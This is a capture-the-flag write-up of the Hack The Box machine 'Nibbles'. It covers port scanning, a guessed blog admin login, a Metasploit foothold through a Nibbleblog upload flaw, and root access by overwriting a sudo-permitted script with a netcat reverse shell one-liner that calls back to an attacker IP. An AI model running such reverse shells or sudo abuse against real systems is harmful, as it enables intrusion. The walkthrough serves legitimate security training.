Hack The Box: Nibbles


Enumeration

box nibbles

The nmap scan reveals two ports: 22 and 80.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77🇩🇪cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

box nibbles

In the comments of the HTML page, we find the following hint:

<!-- /nibbleblog/ directory. Nothing interesting here! -->

The subdirectory nibbleblog/ reveals a webpage:

box nibbles

gobuster reveals an admin directory and also an admin-php page:

box nibbles

The login is admin:nibbles, which is mostly guessing. I found some hints that this might be the case so I tried it.


Initial Foothold

The Nibbleblog-version is 4.0.3 and has a file upload vulnerability. For example, we could upload a reverse shell ot the admin image, at least according to this exploit script which I did not try. I simply used metasploit to do the job.

meterpreter > getuid
Server username: nibbler

With this, we can grab the user flag. Now let’s try to get root. sudo -l reveals something interesting: we can execute a script called /home/nibbler/personal/stuff/monitor.sh as user root.

The original monitor.sh file can be foudn in a zip-file in Nibbler’s home folder, but actually we do not need it, we can simply craft our own one. After some testing, I used the netcat OpenBSD reverse shell from Payloads All The Things:

$ echo 'rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.31 4444 >/tmp/f' > monitor.sh

And then execute it with:

sudo -u root sudo /home/nibbler/personal/stuff/monitor.sh

And with this, we get a root shell and the flag.